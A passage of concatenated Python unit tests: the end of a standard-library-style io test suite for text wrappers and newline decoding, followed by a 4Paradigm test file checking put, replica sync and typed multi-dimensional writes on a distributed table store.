txt = self.TextIOWrapper(buf, encoding="ascii", newline=newline)
self.assertEquals(txt.readlines(), expected)
txt.seek(0)
self.assertEquals(txt.read(), "".join(expected))
def test_newlines_output(self):
testdict = {
"": b"AAA\nBBB\nCCC\nX\rY\r\nZ",
"\n": b"AAA\nBBB\nCCC\nX\rY\r\nZ",
"\r": b"AAA\rBBB\rCCC\rX\rY\r\rZ",
"\r\n": b"AAA\r\nBBB\r\nCCC\r\nX\rY\r\r\nZ",
}
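# newline=None means "\n" is translated to the platform default, hence the os.linesep entry below.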
tests = [(None, testdict[os.linesep])] + sorted(testdict.items())
for newline, expected in tests:
buf = self.BytesIO()
txt = self.TextIOWrapper(buf, encoding="ascii", newline=newline)
txt.write("AAA\nB")
txt.write("BB\nCCC\n")
txt.write("X\rY\r\nZ")
txt.flush()
self.assertEquals(buf.closed, False)
self.assertEquals(buf.getvalue(), expected)
def test_destructor(self):
l = []
base = self.BytesIO
class MyBytesIO(base):
def close(self):
l.append(self.getvalue())
base.close(self)
b = MyBytesIO()
t = self.TextIOWrapper(b, encoding="ascii")
t.write("abc")
del t
support.gc_collect()
self.assertEquals([b"abc"], l)
def test_override_destructor(self):
record = []
class MyTextIO(self.TextIOWrapper):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
b = self.BytesIO()
t = MyTextIO(b, encoding="ascii")
del t
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_error_through_destructor(self):
# Test that the exception state is not modified by a destructor,
# even if close() fails.
rawio = self.CloseFailureIO()
def f():
self.TextIOWrapper(rawio).xyzzy
with support.captured_output("stderr") as s:
self.assertRaises(AttributeError, f)
s = s.getvalue().strip()
if s:
# The destructor *may* have printed an unraisable error, check it
self.assertEqual(len(s.splitlines()), 1)
self.assertTrue(s.startswith("Exception IOError: "), s)
self.assertTrue(s.endswith(" ignored"), s)
# Systematic tests of the text I/O API
def test_basic_io(self):
for chunksize in (1, 2, 3, 4, 5, 15, 16, 17, 31, 32, 33, 63, 64, 65):
for enc in "ascii", "latin1", "utf8":  # , "utf-16-be", "utf-16-le":
f = self.open(support.TESTFN, "w+", encoding=enc)
f._CHUNK_SIZE = chunksize
self.assertEquals(f.write("abc"), 3)
f.close()
f = self.open(support.TESTFN, "r+", encoding=enc)
f._CHUNK_SIZE = chunksize
self.assertEquals(f.tell(), 0)
self.assertEquals(f.read(), "abc")
cookie = f.tell()
self.assertEquals(f.seek(0), 0)
self.assertEquals(f.read(2), "ab")
self.assertEquals(f.read(1), "c")
self.assertEquals(f.read(1), "")
self.assertEquals(f.read(), "")
self.assertEquals(f.tell(), cookie)
self.assertEquals(f.seek(0), 0)
self.assertEquals(f.seek(0, 2), cookie)
self.assertEquals(f.write("def"), 3)
self.assertEquals(f.seek(cookie), cookie)
self.assertEquals(f.read(), "def")
if enc.startswith("utf"):
self.multi_line_test(f, enc)
f.close()
def multi_line_test(self, f, enc):
f.seek(0)
f.truncate()
sample = "s\xff\u0fff\uffff"
wlines = []
for size in (0, 1, 2, 3, 4, 5, 30, 31, 32, 33, 62, 63, 64, 65, 1000):
chars = []
for i in range(size):
chars.append(sample[i % len(sample)])
line = "".join(chars) + "\n"
wlines.append((f.tell(), line))
f.write(line)
f.seek(0)
rlines = []
while True:
pos = f.tell()
line = f.readline()
if not line:
break
rlines.append((pos, line))
self.assertEquals(rlines, wlines)
def test_telling(self):
f = self.open(support.TESTFN, "w+", encoding="utf8")
p0 = f.tell()
f.write("\xff\n")
p1 = f.tell()
f.write("\xff\n")
p2 = f.tell()
f.seek(0)
self.assertEquals(f.tell(), p0)
self.assertEquals(f.readline(), "\xff\n")
self.assertEquals(f.tell(), p1)
self.assertEquals(f.readline(), "\xff\n")
self.assertEquals(f.tell(), p2)
f.seek(0)
for line in f:
self.assertEquals(line, "\xff\n")
self.assertRaises(IOError, f.tell)
self.assertEquals(f.tell(), p2)
f.close()
def test_seeking(self):
chunk_size = _default_chunk_size()
prefix_size = chunk_size - 2
u_prefix = "a" * prefix_size
prefix = bytes(u_prefix.encode("utf-8"))
self.assertEquals(len(u_prefix), len(prefix))
u_suffix = "\u8888\n"
suffix = bytes(u_suffix.encode("utf-8"))
line = prefix + suffix
f = self.open(support.TESTFN, "wb")
f.write(line*2)
f.close()
f = self.open(support.TESTFN, "r", encoding="utf-8")
s = f.read(prefix_size)
self.assertEquals(s, str(prefix, "ascii"))
self.assertEquals(f.tell(), prefix_size)
self.assertEquals(f.readline(), u_suffix)
def test_seeking_too(self):
# Regression test for a specific bug
data = b'\xe0\xbf\xbf\n'
f = self.open(support.TESTFN, "wb")
f.write(data)
f.close()
f = self.open(support.TESTFN, "r", encoding="utf-8")
f._CHUNK_SIZE # Just test that it exists
f._CHUNK_SIZE = 2
f.readline()
f.tell()
def test_seek_and_tell(self):
#Test seek/tell using the StatefulIncrementalDecoder.
# Make test faster by doing smaller seeks
CHUNK_SIZE = 128
def test_seek_and_tell_with_data(data, min_pos=0):
"""Tell/seek to various points within a data stream and ensure
that the decoded data returned by read() is consistent."""
f = self.open(support.TESTFN, 'wb')
f.write(data)
f.close()
f = self.open(support.TESTFN, encoding='test_decoder')
f._CHUNK_SIZE = CHUNK_SIZE
decoded = f.read()
f.close()
for i in range(min_pos, len(decoded) + 1): # seek positions
for j in [1, 5, len(decoded) - i]: # read lengths
f = self.open(support.TESTFN, encoding='test_decoder')
self.assertEquals(f.read(i), decoded[:i])
cookie = f.tell()
self.assertEquals(f.read(j), decoded[i:i + j])
f.seek(cookie)
self.assertEquals(f.read(), decoded[i:])
f.close()
# Enable the test decoder.
StatefulIncrementalDecoder.codecEnabled = 1
# Run the tests.
try:
# Try each test case.
for input, _, _ in StatefulIncrementalDecoderTest.test_cases:
test_seek_and_tell_with_data(input)
# Position each test case so that it crosses a chunk boundary.
for input, _, _ in StatefulIncrementalDecoderTest.test_cases:
offset = CHUNK_SIZE - len(input)//2
prefix = b'.'*offset
# Don't bother seeking into the prefix (takes too long).
min_pos = offset*2
test_seek_and_tell_with_data(prefix + input, min_pos)
# Ensure our test decoder won't interfere with subsequent tests.
finally:
StatefulIncrementalDecoder.codecEnabled = 0
def test_encoded_writes(self):
data = "1234567890"
tests = ("utf-16",
"utf-16-le",
"utf-16-be",
"utf-32",
"utf-32-le",
"utf-32-be")
for encoding in tests:
buf = self.BytesIO()
f = self.TextIOWrapper(buf, encoding=encoding)
# Check if the BOM is written only once (see issue1753).
f.write(data)
f.write(data)
f.seek(0)
self.assertEquals(f.read(), data * 2)
f.seek(0)
self.assertEquals(f.read(), data * 2)
self.assertEquals(buf.getvalue(), (data * 2).encode(encoding))
def test_unreadable(self):
class UnReadable(self.BytesIO):
def readable(self):
return False
txt = self.TextIOWrapper(UnReadable())
self.assertRaises(IOError, txt.read)
def test_read_one_by_one(self):
txt = self.TextIOWrapper(self.BytesIO(b"AA\r\nBB"))
reads = ""
while True:
c = txt.read(1)
if not c:
break
reads += c
self.assertEquals(reads, "AA\nBB")
# read in amounts equal to TextIOWrapper._CHUNK_SIZE which is 128.
def test_read_by_chunk(self):
# make sure "\r\n" straddles 128 char boundary.
txt = self.TextIOWrapper(self.BytesIO(b"A" * 127 + b"\r\nB"))
reads = ""
while True:
c = txt.read(128)
if not c:
break
reads += c
self.assertEquals(reads, "A"*127+"\nB")
def test_issue1395_1(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
# read one char at a time
reads = ""
while True:
c = txt.read(1)
if not c:
break
reads += c
self.assertEquals(reads, self.normalized)
def test_issue1395_2(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = ""
while True:
c = txt.read(4)
if not c:
break
reads += c
self.assertEquals(reads, self.normalized)
def test_issue1395_3(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
reads += txt.read(4)
reads += txt.readline()
reads += txt.readline()
reads += txt.readline()
self.assertEquals(reads, self.normalized)
def test_issue1395_4(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
reads += txt.read()
self.assertEquals(reads, self.normalized)
def test_issue1395_5(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
pos = txt.tell()
txt.seek(0)
txt.seek(pos)
self.assertEquals(txt.read(4), "BBB\n")
def test_issue2282(self):
buffer = self.BytesIO(self.testdata)
txt = self.TextIOWrapper(buffer, encoding="ascii")
self.assertEqual(buffer.seekable(), txt.seekable())
def test_append_bom(self):
# The BOM is not written again when appending to a non-empty file
filename = support.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
pos = f.tell()
with self.open(filename, 'rb') as f:
self.assertEquals(f.read(), 'aaa'.encode(charset))
with self.open(filename, 'a', encoding=charset) as f:
f.write('xxx')
with self.open(filename, 'rb') as f:
self.assertEquals(f.read(), 'aaaxxx'.encode(charset))
def test_seek_bom(self):
# Same test, but when seeking manually
filename = support.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
pos = f.tell()
with self.open(filename, 'r+', encoding=charset) as f:
f.seek(pos)
f.write('zzz')
f.seek(0)
f.write('bbb')
with self.open(filename, 'rb') as f:
self.assertEquals(f.read(), 'bbbzzz'.encode(charset))
def test_errors_property(self):
with self.open(support.TESTFN, "w") as f:
self.assertEqual(f.errors, "strict")
with self.open(support.TESTFN, "w", errors="replace") as f:
self.assertEqual(f.errors, "replace")
def test_threads_write(self):
# Issue6750: concurrent writes could duplicate data
event = threading.Event()
with self.open(support.TESTFN, "w", buffering=1) as f:
def run(n):
text = "Thread%03d\n" % n
event.wait()
f.write(text)
threads = [threading.Thread(target=lambda n=x: run(n))
for x in range(20)]
for t in threads:
t.start()
time.sleep(0.02)
event.set()
for t in threads:
t.join()
with self.open(support.TESTFN) as f:
content = f.read()
for n in range(20):
self.assertEquals(content.count("Thread%03d\n" % n), 1)
class CTextIOWrapperTest(TextIOWrapperTest):
def test_initialization(self):
r = self.BytesIO(b"\xc3\xa9\n\n")
b = self.BufferedReader(r, 1000)
t = self.TextIOWrapper(b)
self.assertRaises(TypeError, t.__init__, b, newline=42)
self.assertRaises(ValueError, t.read)
self.assertRaises(ValueError, t.__init__, b, newline='xyzzy')
self.assertRaises(ValueError, t.read)
def test_garbage_collection(self):
# C TextIOWrapper objects are collected, and collecting them flushes
# all data to disk.
# The Python version has __del__, so it ends in gc.garbage instead.
rawio = io.FileIO(support.TESTFN, "wb")
b = self.BufferedWriter(rawio)
t = self.TextIOWrapper(b, encoding="ascii")
t.write("456def")
t.x = t
wr = weakref.ref(t)
del t
support.gc_collect()
self.assertTrue(wr() is None, wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"456def")
class PyTextIOWrapperTest(TextIOWrapperTest):
pass
class IncrementalNewlineDecoderTest(unittest.TestCase):
def check_newline_decoding_utf8(self, decoder):
# UTF-8 specific tests for a newline decoder
def _check_decode(b, s, **kwargs):
# We exercise getstate() / setstate() as well as decode()
state = decoder.getstate()
self.assertEquals(decoder.decode(b, **kwargs), s)
decoder.setstate(state)
self.assertEquals(decoder.decode(b, **kwargs), s)
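# Feed a 3-byte UTF-8 sequence (U+8888) one byte at a time; nothing decodes until the last byte arrives.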
_check_decode(b'\xe8\xa2\x88', "\u8888")
_check_decode(b'\xe8', "")
_check_decode(b'\xa2', "")
_check_decode(b'\x88', "\u8888")
_check_decode(b'\xe8', "")
_check_decode(b'\xa2', "")
_check_decode(b'\x88', "\u8888")
_check_decode(b'\xe8', "")
self.assertRaises(UnicodeDecodeError, decoder.decode, b'', final=True)
decoder.reset()
_check_decode(b'\n', "\n")
_check_decode(b'\r', "")
_check_decode(b'', "\n", final=True)
_check_decode(b'\r', "\n", final=True)
_check_decode(b'\r', "")
_check_decode(b'a', "\na")
_check_decode(b'\r\r\n', "\n\n")
_check_decode(b'\r', "")
_check_decode(b'\r', "\n")
_check_decode(b'\na', "\na")
_check_decode(b'\xe8\xa2\x88\r\n', "\u8888\n")
_check_decode(b'\xe8\xa2\x88', "\u8888")
_check_decode(b'\n', "\n")
_check_decode(b'\xe8\xa2\x88\r', "\u8888")
_check_decode(b'\n', "\n")
def check_newline_decoding(self, decoder, encoding):
result = []
if encoding is not None:
encoder = codecs.getincrementalencoder(encoding)()
def _decode_bytewise(s):
# Decode one byte at a time
for b in encoder.encode(s):
result.append(decoder.decode(bytes([b])))
else:
encoder = None
def _decode_bytewise(s):
# Decode one char at a time
for c in s:
result.append(decoder.decode(c))
self.assertEquals(decoder.newlines, None)
_decode_bytewise("abc\n\r")
self.assertEquals(decoder.newlines, '\n')
_decode_bytewise("\nabc")
self.assertEquals(decoder.newlines, ('\n', '\r\n'))
_decode_bytewise("abc\r")
self.assertEquals(decoder.newlines, ('\n', '\r\n'))
_decode_bytewise("abc")
self.assertEquals(decoder.newlines, ('\r', '\n', '\r\n'))
_decode_bytewise("abc\r")
self.assertEquals("".join(result), "abc\n\nabcabc\nabcabc")
decoder.reset()
input = "abc"
if encoder is not None:
encoder.reset()
input = encoder.encode(input)
self.assertEquals(decoder.decode(input), "abc")
self.assertEquals(decoder.newlines, None)
def test_newline_decoder(self):
encodings = (
# None meaning the IncrementalNewlineDecoder takes unicode input
# rather than bytes input
None, 'utf-8', 'latin-1',
'utf-16', 'utf-16-le', 'utf-16-be',
'utf-32', 'utf-32-le', 'utf-32-be',
)
for enc in encodings:
decoder = enc and codecs.getincrementaldecoder(enc)()
decoder = self.IncrementalNewlineDecoder(decoder, translate=True)
self.check_newline_decoding(decoder, enc)
decoder = codecs.getincrementaldecoder("utf-8")()
decoder = self.IncrementalNewlineDecoder(decoder, translate=True)
self.check_newline_decoding_utf8(decoder)
def test_newline_bytes(self):
# Issue 5433: Excessive optimization in IncrementalNewlineDecoder
def _check(dec):
self.assertEquals(dec.newlines, None)
self.assertEquals(dec.decode("\u0D00"), "\u0D00")
self.assertEquals(dec.newlines, None)
self.assertEquals(dec.decode("\u0A00"), "\u0A00")
self.assertEquals(dec.newlines, None)
dec = self.IncrementalNewlineDecoder(None, translate=False)
_check(dec)
dec = self.IncrementalNewlineDecoder(None, translate=True)
_check(dec)
class CIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest):
pass
class PyIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest):
pass
# XXX Tests for open()
class MiscIOTest(unittest.TestCase):
def tearDown(self):
support.unlink(support.TESTFN)
def test___all__(self):
for name in self.io.__all__:
obj = getattr(self.io, name, None)
self.assertTrue(obj is not None, name)
if name == "open":
continue
elif "error" in name.lower() or name == "UnsupportedOperation":
self.assertTrue(issubclass(obj, Exception), name)
elif not name.startswith("SEEK_"):
self.assertTrue(issubclass(obj, self.IOBase))
def test_attributes(self):
f = self.open(support.TESTFN, "wb", buffering=0)
self.assertEquals(f.mode, "wb")
f.close()
f = self.open(support.TESTFN, "U")
self.assertEquals(f.name, support.TESTFN)
self.assertEquals(f.buffer.name, support.TESTFN)
self.assertEquals(f.buffer.raw.name, support.TESTFN)
self.assertEquals(f.mode, "U")
self.assertEquals(f.buffer.mode, "rb")
self.assertEquals(f.buffer.raw.mode, "rb")
f.close()
f = self.open(support.TESTFN, "w+")
self.assertEquals(f.mode, "w+")
self.assertEquals(f.buffer.mode, "rb+") # Does it really matter?
self.assertEquals(f.buffer.raw.mode, "rb+")
g = self.open(f.fileno(), "wb", closefd=False)
self.assertEquals(g.mode, "wb")
self.assertEquals(g.raw.mode, "wb")
self.assertEquals(g.name, f.fileno())
self.assertEquals(g.raw.name, f.fileno())
f.close()
g.close()
def test_io_after_close(self):
for kwargs in [
{"mode": "w"},
{"mode": "wb"},
{"mode": "w", "buffering": 1},
{"mode": "w", "buffering": 2},
{"mode": "wb", "buffering": 0},
{"mode": "r"},
{"mode": "rb"},
{"mode": "r", "buffering": 1},
{"mode": "r", "buffering": 2},
{"mode": "rb", "buffering": 0},
{"mode": "w+"},
{"mode": "w+b"},
{"mode": "w+", "buffering": 1},
{"mode": "w+", "buffering": 2},
{"mode": "w+b", "buffering": 0},
]:
f = self.open(support.TESTFN, **kwargs)
f.close()
self.assertRaises(ValueError, f.flush)
self.assertRaises(ValueError, f.fileno)
self.assertRaises(ValueError, f.isatty)
self.assertRaises(ValueError, f.__iter__)
if hasattr(f, "peek"):
self.assertRaises(ValueError, f.peek, 1)
self.assertRaises(ValueError, f.read)
if hasattr(f, "read1"):
self.assertRaises(ValueError, f.read1, 1024)
if hasattr(f, "readinto"):
self.assertRaises(ValueError, f.readinto, bytearray(1024))
self.assertRaises(ValueError, f.readline)
self.assertRaises(ValueError, f.readlines)
self.assertRaises(ValueError, f.seek, 0)
self.assertRaises(ValueError, f.tell)
self.assertRaises(ValueError, f.truncate)
self.assertRaises(ValueError, f.write,
b"" if "b" in kwargs['mode'] else "")
self.assertRaises(ValueError, f.writelines, [])
self.assertRaises(ValueError, next, f)
def test_blockingioerror(self):
# Various BlockingIOError issues
self.assertRaises(TypeError, self.BlockingIOError)
self.assertRaises(TypeError, self.BlockingIOError, 1)
self.assertRaises(TypeError, self.BlockingIOError, 1, 2, 3, 4)
self.assertRaises(TypeError, self.BlockingIOError, 1, "", None)
b = self.BlockingIOError(1, "")
self.assertEqual(b.characters_written, 0)
class C(str):
pass
c = C("")
b = self.BlockingIOError(1, c)
c.b = b
b.c = c
wr = weakref.ref(c)
del c, b
support.gc_collect()
self.assertTrue(wr() is None, wr)
def test_abcs(self):
# Test the visible base classes are ABCs.
self.assertTrue(isinstance(self.IOBase, abc.ABCMeta))
self.assertTrue(isinstance(self.RawIOBase, abc.ABCMeta))
self.assertTrue(isinstance(self.BufferedIOBase, abc.ABCMeta))
self.assertTrue(isinstance(self.TextIOBase, abc.ABCMeta))
def _check_abc_inheritance(self, abcmodule):
with self.open(support.TESTFN, "wb", buffering=0) as f:
self.assertTrue(isinstance(f, abcmodule.IOBase))
self.assertTrue(isinstance(f, abcmodule.RawIOBase))
self.assertFalse(isinstance(f, abcmodule.BufferedIOBase))
self.assertFalse(isinstance(f, abcmodule.TextIOBase))
with self.open(support.TESTFN, "wb") as f:
self.assertTrue(isinstance(f, abcmodule.IOBase))
self.assertFalse(isinstance(f, abcmodule.RawIOBase))
self.assertTrue(isinstance(f, abcmodule.BufferedIOBase))
self.assertFalse(isinstance(f, abcmodule.TextIOBase))
with self.open(support.TESTFN, "w") as f:
self.assertTrue(isinstance(f, abcmodule.IOBase))
self.assertFalse(isinstance(f, abcmodule.RawIOBase))
self.assertFalse(isinstance(f, abcmodule.BufferedIOBase))
self.assertTrue(isinstance(f, abcmodule.TextIOBase))
def test_abc_inheritance(self):
# Test implementations inherit from their respective ABCs
self._check_abc_inheritance(self)
def test_abc_inheritance_official(self):
# Test implementations inherit from the official ABCs of the
# baseline "io" module.
self._check_abc_inheritance(io)
class CMiscIOTest(MiscIOTest):
io = io
class PyMiscIOTest(MiscIOTest):
io = pyio
def test_main():
tests = (CIOTest, PyIOTest,
CBufferedReaderTest, PyBufferedReaderTest,
CBufferedWriterTest, PyBufferedWriterTest,
CBufferedRWPairTest, PyBufferedRWPairTest,
CBufferedRandomTest, PyBufferedRandomTest,
StatefulIncrementalDecoderTest,
CIncrementalNewlineDecoderTest, PyIncrementalNewlineDecoderTest,
CTextIOWrapperTest, PyTextIOWrapperTest,
CMiscIOTest, PyMiscIOTest,)
# Put the namespaces of the IO module we are testing and some useful mock
# classes in the __dict__ of each test.
mocks = (MockRawIO, MisbehavedRawIO, MockFileIO, CloseFailureIO,
MockNonBlockWriterIO)
all_members = io.__all__ + ["IncrementalNewlineDecoder"]
c_io_ns = {name : getattr(io, name) for name in all_members}
py_io_ns = {name : getattr(pyio, name) for name in all_members}
globs = globals()
c_io_ns.update((x.__name__, globs["C" + x.__name__]) for x in mocks)
py_io_ns.update((x.__name__, globs["Py" + x.__name__]) for x in mocks)
# Avoid turning open into a bound method.
py_io_ns["open"] = pyio.OpenWrapper
for test in tests:
if test.__name__.startswith("C"):
for name, obj in c_io_ns.items():
setattr(test, name, obj)
elif test.__name__.startswith("Py"):
for name, obj in py_io_ns.items():
setattr(test, name, obj)
support.run_unittest(*tests)
if __name__ == "__main__":
test_main()
|
test_put.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Copyright 2021 4Paradigm
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from testcasebase import TestCaseBase
import threading
import time
from libs.deco import multi_dimension
from libs.logger import infoLogger
import libs.ddt as ddt
from libs.test_loader import load
import ctypes
import libs.utils as utils
@ddt.ddt
class TestPut(TestCaseBase):
def test_put_normal(self):
"""
After a successful put, the value can be scanned back out.
:return:
"""
rs1 = self.create(self.leader, 't', self.tid, self.pid, 144000, 2)
self.assertIn('Create table ok', rs1)
rs2 = self.put(self.leader,
self.tid,
self.pid,
'testkey0',
self.now(),
'testvalue0')
self.assertIn('Put ok', rs2)
time.sleep(1)
self.assertTrue(
'testvalue0' in self.scan(self.leader, self.tid, self.pid, 'testkey0', self.now(), 1))
@multi_dimension(False)
def test_put_slave_sync(self):
"""
After a put to the leader, the slave syncs the data successfully.
:return:
"""
rs1 = self.create(self.leader, 't', self.tid, self.pid, 144000, 2, 'true')
self.assertIn('Create table ok', rs1)
rs2 = self.create(self.slave1, 't', self.tid, self.pid, 144000, 2, 'false')
self.assertIn('Create table ok', rs2)
rs = self.addreplica(self.leader, self.tid, self.pid, 'client', self.slave1)
self.assertIn('AddReplica ok', rs)
rs2 = self.put(self.leader,
self.tid,
self.pid,
'testkey0',
self.now(),
'testvalue0')
self.assertIn('Put ok', rs2)
time.sleep(1)
self.assertIn(
'testvalue0', self.scan(self.slave1, self.tid, self.pid, 'testkey0', self.now(), 1))
@multi_dimension(True)
def test_put_slave_sync_md(self):
"""
After a put to the leader, the slave syncs the data successfully.
:return:
"""
rs1 = self.create(self.leader, 't', self.tid, self.pid, 144000, 2, 'true')
self.assertIn('Create table ok', rs1)
rs2 = self.create(self.slave1, 't', self.tid, self.pid, 144000, 2, 'false')
self.assertIn('Create table ok', rs2)
rs3 = self.addreplica(self.leader, self.tid, self.pid, 'client', self.slave1)
self.assertIn('AddReplica ok', rs3)
rs4 = self.put(self.leader,
self.tid,
self.pid,
'',
self.now(),
'testvalue0', '1.1', 'testkey0')
self.assertIn('Put ok', rs4)
time.sleep(1)
self.assertIn(
'testvalue0', self.scan(self.slave1, self.tid, self.pid, {'card': 'testkey0'}, self.now(), 1))
def test_put_slave_cannot_put(self):
"""
A put to a slave (non-leader) table is rejected.
:return:
"""
rs1 = self.create(self.leader, 't', self.tid, self.pid, 144000, 8, 'false')
self.assertIn('Create table ok', rs1)
rs2 = self.put(self.leader,
self.tid,
self.pid,
'testkey0',
self.now(),
'testvalue0')
self.assertIn('Put failed', rs2)
@multi_dimension(False)
def test_put_slave_killed_while_leader_putting(self):
"""
Killing the slave while data is being written does not affect the leader.
After restarting, loadtable succeeds and the slave's data matches the leader's.
:return:
"""
rs1 = self.create(self.leader, 't', self.tid, self.pid, 144000, 8, 'true')
self.assertIn('Create table ok', rs1)
rs2 = self.create(self.slave1, 't', self.tid, self.pid, 144000, 8, 'false')
self.assertIn('Create table ok', rs2)
rs = self.addreplica(self.leader, self.tid, self.pid, 'client', self.slave1)
self.assertIn('AddReplica ok', rs)
def put(count):
for i in range(0, count):
self.put(self.leader,
self.tid,
self.pid,
'testkey',
self.now() + 10000 + i,
'testvalue{}'.format(i))
def stop_client(endpoint):
self.stop_client(endpoint)
threads = [threading.Thread(
target=put, args=(20,)), threading.Thread(
target=stop_client, args=(self.slave1,))]
# The slave node is killed about 1s after data writing starts
for t in threads:
t.start()
time.sleep(2)
for t in threads:
t.join()
time.sleep(10)
self.start_client(self.slave1)
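# Recovery: wipe the slave's stale binlog, copy the leader's db files over, then loadtable.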
utils.exe_shell('rm -rf {}/db/{}_{}/binlog'.format(self.slave1path, self.tid, self.pid))
self.cp_db(self.leaderpath, self.slave1path, self.tid, self.pid)
rs4 = self.loadtable(self.slave1, 't', self.tid, self.pid, 144000, 8, 'false', self.slave1)
self.assertIn('LoadTable ok', rs4)
time.sleep(1)
self.assertIn('testvalue19', self.scan(self.slave1, self.tid, self.pid, 'testkey', self.now(), 1))
self.put(self.leader, self.tid, self.pid, 'testkey', self.now() + 10000, 'testvalue20')
time.sleep(1)
rs5 = self.scan(self.slave1, self.tid, self.pid, 'testkey', self.now() * 2, 1)
self.assertIn('testvalue20', rs5)
@multi_dimension(True)
def test_put_slave_killed_while_leader_putting_md(self):
"""
Killing the slave while data is being written does not affect the leader.
After restarting, loadtable succeeds and the slave's data matches the leader's.
:return:
"""
rs1 = self.create(self.leader, 't', self.tid, self.pid, 144000, 8, 'true')
self.assertIn('Create table ok', rs1)
rs2 = self.create(self.slave1, 't', self.tid, self.pid, 144000, 8, 'false')
self.assertIn('Create table ok', rs2)
def put(count):
for i in range(0, count):
self.put(self.leader,
self.tid,
self.pid,
'',
self.now() - 1,
'testvalue{}'.format(i), '1.1', 'testkey')
def stop_client(endpoint):
self.stop_client(endpoint)
threads = [threading.Thread(
target=put, args=(20,)), threading.Thread(
target=stop_client, args=(self.slave1,))]
# The slave node is killed about 1s after data writing starts
for t in threads:
t.start()
time.sleep(2)
for t in threads:
t.join()
time.sleep(10)
self.start_client(self.slave1)
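# Recovery: wipe the slave's stale binlog, copy the leader's db files over, then loadtable.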
utils.exe_shell('rm -rf {}/db/{}_{}/binlog'.format(self.slave1path, self.tid, self.pid))
self.cp_db(self.leaderpath, self.slave1path, self.tid, self.pid)
rs4 = self.loadtable(self.slave1, 't', self.tid, self.pid, 144000, 8, 'false', self.slave1)
self.assertIn('LoadTable ok', rs4)
time.sleep(1)
self.assertIn('testvalue19', self.scan(self.slave1, self.tid, self.pid, {'card':'testkey'}, self.now(), 1))
@multi_dimension(True)
@ddt.data(
({'card': ('string:index', 'str1'), 'card2': ('int32:index', 3), 'amt': ('double', 1.1)}, 'Put ok'),
({'card': ('string:index', 'card0')}, 'Put ok'),
({'card': ('string:index', 'str1'), 'card2': ('int32:index', 3), 'amt': ('double', '')},
'Encode dimension error'),
({'card': ('string:index', 'str1'), 'card2': ('int32', 3), 'amt': ('double', 1.1)}, 'Put ok'),
)
@ddt.unpack
def test_sput_index(self, kv, rsp_msg):
"""
Create a multi-dimensional table and test index columns.
:return:
"""
self.create(self.leader, 't', self.tid, self.pid, 144000, 2, 'true', **{k: v[0] for k, v in kv.items()})
rs1 = self.put(self.leader, self.tid, self.pid, '', self.now(), *[str(v[1]) for v in kv.values()])
self.assertIn(rsp_msg, rs1)
@multi_dimension(True)
@ddt.data(
({'card': ('string:index', '0'), 's2': ('int32', 2147483647)},
'Put ok', {'card': '0'}, '2147483647'),
({'card': ('string:index', '1'), 's2': ('int32', 1.1)},
'Encode data error', {}, ''),
({'card': ('string:index', '2'), 's2': ('int32', 1e+5)},
'Encode data error', {}, ''),
({'card': ('string:index', '3'), 's2': ('int32', 'aaaa')},
'Encode data error', {}, ''),
({'card': ('string:index', '4'), 's2': ('int32', 2147483648)},
'Encode data error', {}, ''),
({'card': ('string:index', '5'), 's2': ('int32', -214)},
'Put ok', {'card': '5'}, '-214'),
({'card': ('string:index', '6'), 's2': ('int64', -9223372036854775808)},
'Put ok', {'card': '6'}, '-9223372036854775808'),
({'card': ('string:index', '7'), 's2': ('int64', -9223372036854775809)},
'Encode data error', {}, ''),
)
@ddt.unpack
def test_sput_int(self, kv, rsp_msg, scan_kv, scan_value):
"""
Create a multi-dimensional table and test the int32 and int64 types.
:return:
"""
self.create(self.leader, 't', self.tid, self.pid, 144000, 2, 'true', **{k: v[0] for k, v in kv.items()})
rs1 = self.put(self.leader, self.tid, self.pid, '', self.now(), *[str(v[1]) for v in kv.values()])
self.assertIn(rsp_msg, rs1)
if scan_kv != {}:
rs2 = self.scan(self.leader, self.tid, self.pid, scan_kv, self.now(), 1)
self.assertIn(' ' + str(scan_value) + ' ', rs2)
@multi_dimension(True)
@ddt.data(
({'card': ('string:index', '0'), 's2': ('uint32', 2147483648)},
'Put ok', {'card': '0'}, '2147483648'),
({'card': ('string:index', '1'), 's2': ('uint32', 1.1)},
'Encode data error', {}, ''),
({'card': ('string:index', '2'), 's2': ('uint32', 1e+5)},
'Encode data error', {}, ''),
({'card': ('string:index', '3'), 's2': ('uint32', 'aaaa')},
'Encode data error', {}, ''),
({'card': ('string:index', '4'), 's2': ('uint32', -2)},
'Encode data error', {}, ''),
({'card': ('string:index', '5'), 's2': ('uint64', 1)},
'Put ok', {'card': '5'}, 1),
({'card': ('string:index', '6'), 's2': ('uint64', -111111111111111111)},
'Encode data error', {}, ''),
)
@ddt.unpack
def test_sput_uint(self, kv, rsp_msg, scan_kv, scan_value):
"""
Create a multi-dimensional table and test the uint32 and uint64 types.
:return:
"""
self.create(self.leader, 't', self.tid, self.pid, 144000, 2, 'true', **{k: v[0] for k, v in kv.items()})
rs1 = self.put(self.leader, self.tid, self.pid, '', self.now(), *[str(v[1]) for v in kv.values()])
